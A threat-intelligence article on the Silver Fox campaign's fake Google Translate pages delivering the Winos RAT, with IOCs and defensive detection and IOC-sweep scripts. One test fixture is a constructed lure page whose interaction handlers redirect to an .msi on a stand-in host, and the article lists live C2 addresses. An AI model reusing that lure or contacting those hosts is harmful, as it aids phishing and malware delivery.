Silver Fox Hackers Exploit Weaponized Google Translate Tools to Deliver Windows Malware

The Knownsec 404 Advanced Threat Intelligence Team has recently observed increased activity from the Silver Fox cybercrime group, which weaponizes counterfeit versions of popular programs to distribute malware.

Dating back to 2024, these attacks often masquerade as the Google Translate interface; JavaScript on the phishing page triggers a redirect on any user interaction (a click, key press, or mouse movement).

The redirect lands on a fabricated alert claiming the visitor's Adobe Flash Player is outdated and coerces them into downloading a malicious installer. Adobe discontinued Flash Player at the end of 2020, so any page that asks for a Flash update is itself a warning sign.
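As an added illustration, not code from the Knownsec 404 report, the following Python heuristic scores a fetched page for the lure pattern described above: an interaction-triggered redirect to a different host, "Flash Player" text, and an off-site .msi/.exe link. The two sample pages and the 192.0.2.10 download address are constructed for the example; the page host www.ggfanyi.com is taken from the IOC list at the end of the article.

```python
import re
from dataclasses import dataclass, field
from urllib.parse import urlparse

# Events that count as "any user interaction" on the page.
INTERACTION_EVENTS = ("click", "mousedown", "mouseup", "mousemove", "keydown",
                      "keyup", "touchstart", "scroll", "wheel")
_EV = "|".join(INTERACTION_EVENTS)
# addEventListener('click', ...) or inline onclick= / onmousemove= handlers
EVENT_RE = re.compile(
    r"addEventListener\(\s*['\"](?P<ev1>%s)['\"]|\bon(?P<ev2>%s)\s*=" % (_EV, _EV),
    re.IGNORECASE)
# location.href = 'http://...', location.replace('http://...'), location = '...'
REDIRECT_RE = re.compile(
    r"(?:window\.|document\.|top\.)?\blocation(?:\.href|\.replace|\.assign)?"
    r"\s*(?:=|\()\s*['\"]?(?P<url>https?://[^'\")\s]+)", re.IGNORECASE)
FLASH_LURE_RE = re.compile(r"flash\s*player", re.IGNORECASE)
INSTALLER_RE = re.compile(r"https?://[^'\"\s<>]+\.(?:msi|exe)\b", re.IGNORECASE)


@dataclass
class Findings:
    interaction_events: list = field(default_factory=list)
    redirect_targets: list = field(default_factory=list)
    installer_links: list = field(default_factory=list)
    flash_lure: bool = False
    score: int = 0


def _offsite(url: str, page_host: str) -> bool:
    host = (urlparse(url).hostname or "").lower()
    return bool(host) and host != page_host.lower()


def scan_page(html: str, page_host: str) -> Findings:
    """Score a fetched page for the Silver Fox lure pattern. Heuristic only."""
    f = Findings()
    for m in EVENT_RE.finditer(html):
        f.interaction_events.append((m.group("ev1") or m.group("ev2")).lower())
    f.redirect_targets = [m.group("url") for m in REDIRECT_RE.finditer(html)
                          if _offsite(m.group("url"), page_host)]
    f.installer_links = [m.group(0) for m in INSTALLER_RE.finditer(html)
                         if _offsite(m.group(0), page_host)]
    f.flash_lure = FLASH_LURE_RE.search(html) is not None
    # Scoring: an interaction-triggered off-site redirect is the core signal (2);
    # Flash Player has been discontinued since the end of 2020, so any update
    # prompt for it is suspect (1); an off-site .msi/.exe link (1); both together (1).
    f.score = (2 * bool(f.interaction_events and f.redirect_targets)
               + bool(f.flash_lure) + bool(f.installer_links)
               + bool(f.flash_lure and f.installer_links))
    return f


# Constructed sample pages (not captured from the campaign); 192.0.2.10 is a
# documentation address standing in for the attacker's download server.
PHISHING_HTML = """<!doctype html><html><head><title>Google 翻译</title></head>
<body onmousemove="lure()">
<div id="alert" style="display:none">您的 Adobe Flash Player 版本过低，请更新后继续使用。</div>
<script>
function lure() {
  document.getElementById('alert').style.display = 'block';
  window.location.href = 'http://192.0.2.10/FlashPlayer_update.msi';
}
document.addEventListener('keydown', lure);
</script></body></html>"""

BENIGN_HTML = """<html><body><p>Welcome.</p>
<a href="https://example.com/docs/setup.pdf">Docs</a>
<script>document.addEventListener('click', function () { console.log('hi'); });</script>
</body></html>"""

if __name__ == "__main__":
    print(scan_page(PHISHING_HTML, "www.ggfanyi.com"))
    print(scan_page(BENIGN_HTML, "example.com"))
```

The constructed phishing page scores 5 (both an inline and a registered interaction handler, an off-site redirect, Flash text and an .msi link), while the benign page scores 0 even though it registers a click handler, because nothing redirects off-site. Treat the score as a triage aid for a URL-analysis pipeline, not as a verdict.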

Emerging Phishing Campaigns

Upon execution, the payload infiltrates the host system, enabling remote control and data exfiltration.

Figure: attack chain

The group's tactics extend beyond translation tools to search engine optimization (SEO) poisoning and spoofed websites that mimic national institutions, seeding the broader Chinese internet ecosystem with Trojan-laden downloads.

A typical attack chain involves luring victims to these decoy sites via poisoned search results or phishing emails, followed by the deployment of installers that embed the Winos remote access Trojan (RAT), a core component of the Silver Fox family.

Since its emergence in 2022, Silver Fox has grown from a single actor into a prolific malware family, fueled by the underground leak of source code such as Winos 4.0.

This has allowed cybercriminals and advanced persistent threat (APT) actors to repurpose the code for diverse campaigns, distributing it through emails, instant messaging, and fabricated download portals.

Recent discoveries include phishing domains impersonating Google Translate, currency converters, and even the official WPS Office site, where embedded scripts facilitate seamless redirection to attacker-controlled servers hosting MSI or EXE installers.

Figure: fake Google Translate page

In-Depth Malware Dissection

Technical dissection of the Silver Fox Trojan reveals a multi-stage infection process. The MSI package drops a set of files, including aicustact.dll, a custom-action DLL that loads whatever payload the attacker has named in the MSI's Property table.

Concurrently, an update.bat script executes legitimate installation routines while surreptitiously launching malicious components.

Persistence is achieved via javaw.exe, which writes an auto-start entry to the Windows registry for Microsoftdata.exe, a Golang-compiled binary whose name mimics Microsoft's naming convention.

This executable decrypts and executes shellcode from an embedded Xps.dtd file, which in turn loads a portable executable (PE) whose PDB path contains strings such as "RexRat4.0.3" and ultimately invokes the Winos RAT.

Winos boasts modular plugins for advanced espionage, including real-time screenshot capture, keystroke logging, and clipboard data harvesting, granting attackers granular control over compromised endpoints.

Expanding the hunt, researchers identified additional decoys such as fake Easy Translation, Youdao Translation, Bit Browser, and LetsVPN installers, all funneling victims toward Winos deployment.

This modularity underscores Silver Fox’s adaptability, with perpetrators iterating on evasion techniques like code obfuscation, forged digital signatures, and cloud sandbox bypassing to maximize infection rates at minimal cost.

APT groups, including Golden Eye Dog, have repurposed these tools for targeted intrusions, amplifying risks to personal privacy and corporate data integrity across the Chinese digital sphere.

Silver Fox represents a rampant malware cluster that erodes user trust in everyday applications. To mitigate, users should obtain installers only from official sites, treat any prompt to update Flash Player as a lure, keep endpoint protection current, and block or alert on the indicators listed below.

Indicators of Compromise (IOC)

Type               IOC Value
Hash (SHA-256)     38bdef0bdf05adeefb1d4ba04296c757eb8cdfb9be958e4c0d544764564df177
Hash (SHA-256)     b5e0893617a6a1b5e5f3c0c85fa82eaa9c6e66a511ca3974e35d6a466b52642a
Hash (SHA-256)     cf17ce1d9a3f0151afd129823303aa949f6c7d71692dff5f6c39bcef03c8dadc
Hash (SHA-256)     cdd221dfe3d856aae18cd5af30fd771df44441c35383278a1559438c3e708cfd
Hash (SHA-256)     4d0ccef5969d7733fc633570d80dfff8ac2362789572c9df8a0320eede2b3284
Hash (SHA-256)     1ce6518a4f31b1d1b500df7966c0a2e93e7a4b728b402727071d7b2d5b2cf5b6
Hash (SHA-256)     42dd5c61c3490447d0b217eca6c1aad9cd9e636fd3b034138a12596d0b03eced
Hash (SHA-256)     61f860c3241f13c9e2a290c14a74ad9d0f018fe36f2ed9e260907b7c12ecb393
Hash (SHA-256)     0d171b33d1a22b2e1e2fb1638295c40f67c4ac40d771e732de2c0e01fd6cd79e
Phishing Website   192.252.181.55
Phishing Website   www.ggfanyi.com
Phishing Website   185.202.101.114
C2 Server          8.218.115.90:8080
C2 Server          8.218.115.90:8081
C2 Server          154.91.66.58:8088
C2 Server          154.91.66.58:8089
C2 Server          103.116.246.234:6234
C2 Server          43.250.174.49:1989
C2 Server          154.222.24.214:886
C2 Server          154.222.24.214:668
C2 Server          206.119.167.191:8003
C2 Server          206.119.167.191:8004
C2 Server          1.94.163.46:666
C2 Server          203.160.55.201:1860
C2 Server          154.94.232.242:8888
C2 Server          154.94.232.242:6666
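To make the table above actionable, here is an added Python sweep (written for this article, not part of the Knownsec 404 report) that parses the IOC list, hashes every file under a directory against the SHA-256 entries, and matches the C2 ip:port pairs and phishing hosts against proxy or firewall log lines. The log lines, the temporary file planted by run_demo, and the field layout of the logs are constructed assumptions; adjust the port extraction to your own log format.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# IOCs transcribed from the table above.
IOC_TABLE = """\
Hash (SHA-256) 38bdef0bdf05adeefb1d4ba04296c757eb8cdfb9be958e4c0d544764564df177
Hash (SHA-256) b5e0893617a6a1b5e5f3c0c85fa82eaa9c6e66a511ca3974e35d6a466b52642a
Hash (SHA-256) cf17ce1d9a3f0151afd129823303aa949f6c7d71692dff5f6c39bcef03c8dadc
Hash (SHA-256) cdd221dfe3d856aae18cd5af30fd771df44441c35383278a1559438c3e708cfd
Hash (SHA-256) 4d0ccef5969d7733fc633570d80dfff8ac2362789572c9df8a0320eede2b3284
Hash (SHA-256) 1ce6518a4f31b1d1b500df7966c0a2e93e7a4b728b402727071d7b2d5b2cf5b6
Hash (SHA-256) 42dd5c61c3490447d0b217eca6c1aad9cd9e636fd3b034138a12596d0b03eced
Hash (SHA-256) 61f860c3241f13c9e2a290c14a74ad9d0f018fe36f2ed9e260907b7c12ecb393
Hash (SHA-256) 0d171b33d1a22b2e1e2fb1638295c40f67c4ac40d771e732de2c0e01fd6cd79e
Phishing Website 192.252.181.55
Phishing Website www.ggfanyi.com
Phishing Website 185.202.101.114
C2 Server 8.218.115.90:8080
C2 Server 8.218.115.90:8081
C2 Server 154.91.66.58:8088
C2 Server 154.91.66.58:8089
C2 Server 103.116.246.234:6234
C2 Server 43.250.174.49:1989
C2 Server 154.222.24.214:886
C2 Server 154.222.24.214:668
C2 Server 206.119.167.191:8003
C2 Server 206.119.167.191:8004
C2 Server 1.94.163.46:666
C2 Server 203.160.55.201:1860
C2 Server 154.94.232.242:8888
C2 Server 154.94.232.242:6666
"""

IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def parse_iocs(table: str):
    """Split the table into a hash set, a phishing-host set and an (ip, port) C2 set."""
    hashes, hosts, c2 = set(), set(), set()
    for line in table.strip().splitlines():
        kind, _, value = line.rpartition(" ")  # value is the last token on the line
        if kind.startswith("Hash"):
            hashes.add(value.lower())
        elif kind.startswith("Phishing"):
            hosts.add(value.lower())
        elif kind.startswith("C2"):
            ip, port = value.split(":")
            c2.add((ip, int(port)))
    return hashes, hosts, c2


def sha256_file(path: Path, chunk: int = 1 << 20) -> str:
    h = hashlib.sha256()
    with path.open("rb") as fh:
        for block in iter(lambda: fh.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def sweep_hashes(root: Path, hashes: set) -> list:
    """Return (path, digest) for every file under root whose SHA-256 is an IOC."""
    return [(p, d) for p in root.rglob("*")
            if p.is_file() and (d := sha256_file(p)) in hashes]


def find_network_hits(lines, c2: set, hosts: set) -> list:
    """Match C2 ip:port pairs and phishing hosts against proxy/firewall log lines.
    The port may sit anywhere in the line (dport=8080 or host:8080), so IPs are
    blanked out before collecting port-like integers; tune this to your log format."""
    hits = []
    for line in lines:
        ips = set(IPV4_RE.findall(line))
        ports = {int(n) for n in re.findall(r"\b\d{1,5}\b", IPV4_RE.sub(" ", line))}
        low = line.lower()
        for ip, port in sorted(c2):
            if ip in ips and port in ports:
                hits.append((line, f"c2 {ip}:{port}"))
        for host in sorted(hosts):
            if (host in ips) if IPV4_RE.fullmatch(host) else (host in low):
                hits.append((line, f"phishing host {host}"))
    return hits


# Constructed log lines (not from the report): two firewall-style, two proxy-style.
SAMPLE_LOGS = [
    "2025-09-02T10:14:03Z fw src=10.0.0.5 dst=8.218.115.90 dport=8080 proto=tcp action=allow",
    '10.0.0.7 - - [02/Sep/2025:10:15:11 +0000] "CONNECT 154.91.66.58:8088 HTTP/1.1" 200',
    '10.0.0.7 - - [02/Sep/2025:10:16:40 +0000] "GET http://www.ggfanyi.com/ HTTP/1.1" 200',
    "2025-09-02T10:17:00Z fw src=10.0.0.9 dst=8.218.115.90 dport=443 proto=tcp action=allow",
]


def run_demo() -> dict:
    """Plant a constructed file, add its digest to the hash set, then run both sweeps."""
    hashes, hosts, c2 = parse_iocs(IOC_TABLE)
    with tempfile.TemporaryDirectory() as tmp:
        sample = Path(tmp) / "update.bat"
        sample.write_bytes(b"constructed sample, not the real dropper\n")
        planted = hashes | {sha256_file(sample)}  # stands in for a real IOC match
        file_hits = sweep_hashes(Path(tmp), planted)
    net_hits = find_network_hits(SAMPLE_LOGS, c2, hosts)
    return {"files": len(file_hits), "network": [tag for _, tag in net_hits]}
```

Run it with `python -c "import ioc_sweep; print(ioc_sweep.run_demo())"` (assuming the block is saved as ioc_sweep.py). The fourth sample line connects to a C2 address on port 443 and is deliberately not flagged: matching on the bare IP would also be reasonable for a hunt, but the table pairs each address with specific ports, so the code keeps that precision and leaves the looser match as a policy choice.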
